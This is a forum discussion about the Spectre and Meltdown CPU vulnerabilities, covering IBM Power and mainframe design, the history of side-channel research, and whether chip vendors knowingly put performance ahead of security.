Your comments regarding mainframe, are you coming more from theory or working at a system engineer level on both that and say AS/400-Power x? - asking as if trying to see if this is a theoretical debate, albeit it does not really matter due to the vulnerability exists anyway.
It's theoretical, extended to a more broad attempt at interpreting what has been done for multiple architectures in general.
I try to ground that in what would be publicly available documentation or presentations, although that is less likely for the more insular products and for modern products in general.
From working with IBM the focus in my experience was specifically virtualisation and security around that without same level of flexibility and ease of use as say AS/400, virtualisation is integral to part of the context around focus on security leakage from CPU-software-memory; same theory you can build security around speculative execution but at a cost to performance.
Power series is more similar to AS/400 than it is to the System Z architectures.
Virtualization implies some level of co-residency in shared hardware. That choice is a prerequisite for these exploits, and the increasing layers of checks in hardware and software are what motivated novel methods of inferring hidden information like timing attacks.
This part of why I was taking a more theoretical angle, because of how impactful decisions made a decade or more ago in a wildly different security context can be.
There are elements to the implementation of a complex CISC architecture in models like Z6 and its and shared elements with Power6 that might have created pressure to defer its checks outside of the streamlined critical loop, which would open a window for speculative side effects. However, doing so could have avoided more easily predicted problems like bugs in natively supporting all the corner cases outside of the front end and put-away stages.
The scalability and RAS features also run counter to security, since they tend to create new state that could be timed.
Power6's runahead mode interests me in terms of meltdown, and it's leveraging the checkpoint stage for part of it. Since Nvidia's Meltdown-susceptible Denver has a similar runahead method, it might matter for the Power 6 as well.
For Meltdown, it can come down to what stage or stages in the pipeline hand specific exceptions related to permissions. It's a long-standing and generally reasonable choice to defer a lot of it to the end of the pipeline.
Spectre and Meltdown have a dependence on when speculation occurs, and what needs to be covered by speculative rollback.
Essentially everyone past the advent of pipelines and caches reverts the IP, register state, flags, deferred stores, or any other state related to instruction semantics visible to the running thread.
I do not know of an architecture that has already made the inciting choice for speculation restoring the state of the cache hierarchy for non-modifying data movement, and given constraints of the early processors that had pipelines+prediction+cache (1970s?), that would have negated the utility of having cache.
The paper and some of the security experts are coming from this with the understanding that for years it has always been a concept of attack via this route, this is not something new and so why the paper frames the sentence as they did along with what some of those researchers say in public;
This is the part I have questions about. I did not interpret that level of criticism from the Spectre paper, so I wanted clarification on which statements in the paper (or discussions outside of it) stated there was a purposeful reduction of security emphasis. I have seen some statements to that effect from some sources, though not usually from sources I'd assume had much visibility on the research or the vendors. For those involved in this research or in the design groups that allegedly chose to implement features they knew would compromise security, I would like to see their reasoning or recollection of events.
I would note that the paper is incomplete, given its being finalized before we found out that Meltdown applies to ARM A75, Intel, Power, Cavium, and Denver. Suggestions are there may be news for Qualcomm's custom core and Fujitsu's SPARC variants.
My interpretation is that there's been an increasing set of security features and countermeasures being added over time onto the architectures, sometimes in reaction to new exploits becoming known. The elements used for Spectre and Meltdown predate nearly everything, and are almost first principles of processor design. It seems plausible to me that resources were heavily invested into new security measures and counter-exploits for attacks as the designers knew them, and they were placed on top of or used elements of those first principles, usually with significant delay due to architectural cycles (not cores or families, but bedrock architectural choices for CPU lines). It then turned out that the things that were grandfathered in were exploitable in a way that they hadn't anticipated.
The Spectre paper stated that these types of attacks were a new class of exploits, and from a meta standpoint the dates of the papers they cite can give some insight as to what was known and when.
There's a succession of papers dealing with side channel attacks, including electrical, branch, and cache timing.
Putting the electrical one aside (although dedicated crypto engines and software mitigations exist in part because of that research), the earliest branch exploits target outside and known algorithms like SSL and AES.
Assuming those were supposed to be taken into account by a new processor, nothing before 2009-2012 would have a chance. They all generally posited software mitigation. So long as the hardware functioned as they assumed, it would have been considered sufficient.
Cache timing goes back to 2003 in relation to DES, with algorithmic/software mitigation posited. Those mitigations have been long-deployed.
The dates for when high-precision timers start showing up are more recent, and many of the old papers concerning key extraction weren't trying to escape any form of isolation.
The combination of timers, branch prediction exploits, cache exploits, and the decision to change focus from a target algorithm to virtual memory or CPU pipeline itself didn't show up until more recently.
A significant hardware change for Spectre (a halt on forwarding for Meltdown may be faster) would be years out. A more comprehensive architectural review would be something on the order of a new platform or notable paradigm shift like clean-sheet CPU architectures or a whole new mode.
just finally they have been successful, or more worringly it was successful years ago and has been exploited quietly by certain state organisations across the world.
So yes one could say done purposefully with focus of performance over security.
It's possible that some nation-states or other large organizations had knowledge of this, although historically OS, software, IO, or explicit hardware errata would have been lower-hanging fruit. The big payoff and major use case impacted by these fixes--cloud services open to the internet running formerly internal services--is more recent.
I wouldn't rule out a lot of them not seeing this coming, though I suppose we'd need to ask some of those agencies if they isolated their kernel mappings to be sure.
Perhaps some of the leaked toolsets out there could be checked for LFENCE instructions or retpolines.
These attacks require local code execution or other forms of access to the machine. Up until recently, that was considered already to be game-over with regards to a nation-state adversary. The legacy of the cloud is one where the world decided to do something that had been considered profoundly stupid from a security standpoint, and not for CPU performance reasons.